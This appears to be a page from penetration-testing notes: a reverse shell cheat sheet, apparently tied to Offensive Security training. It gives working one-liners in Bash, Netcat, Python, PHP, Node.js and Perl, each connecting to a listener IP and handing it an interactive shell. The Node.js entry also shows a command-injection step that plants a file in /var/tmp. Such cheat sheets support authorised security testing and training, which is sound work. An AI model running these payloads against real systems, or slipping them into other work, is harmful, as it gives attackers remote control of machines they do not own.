Reverse Shells

Bash

bash -i >& /dev/tcp/10.10.10.10/9001 0>&1

Netcat

/bin/nc -nv 192.168.45.155 9090 -e /bin/bash

Python

To create a reverse shell with Python, we will create a socket, connect to our listener, duplicate the input, output, and error descriptors and call /bin/sh with subprocess.

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.45.155",9090));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

PHP

The below commands instruct PHP to run (-r) the command within quotes.

php -r '$sock=fsockopen("192.168.45.155",9090);exec("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("192.168.45.155",9090);shell_exec("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("192.168.45.155",9090);system("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("192.168.45.155",9090);passthru("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("192.168.45.155",9090);popen("/bin/sh -i <&3 >&3 2>&3", "r");'

Node.js

The initial command injection will place a malicious file in a world-writable directory (/var/tmp) that calls upon Node.js child_process and exec() functions. The latter will contain the Netcat reverse shell payload.

echo "require('child_process').exec('nc -nv 192.168.45.155 9090 -e /bin/bash')" > /var/tmp/offsec.js ; node /var/tmp/offsec.js

Perl

We import the Socket module, set up our IP and port, and pass these into a socket call. We then initialize the TCP connection (connect()), open channels for STDIN, STDOUT, and STDERR, and call /bin/bash.

perl -e 'use Socket;$i="192.168.45.155";$p=9090;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Resources

PreviousShellsNextWebshells

Last updated

Was this helpful?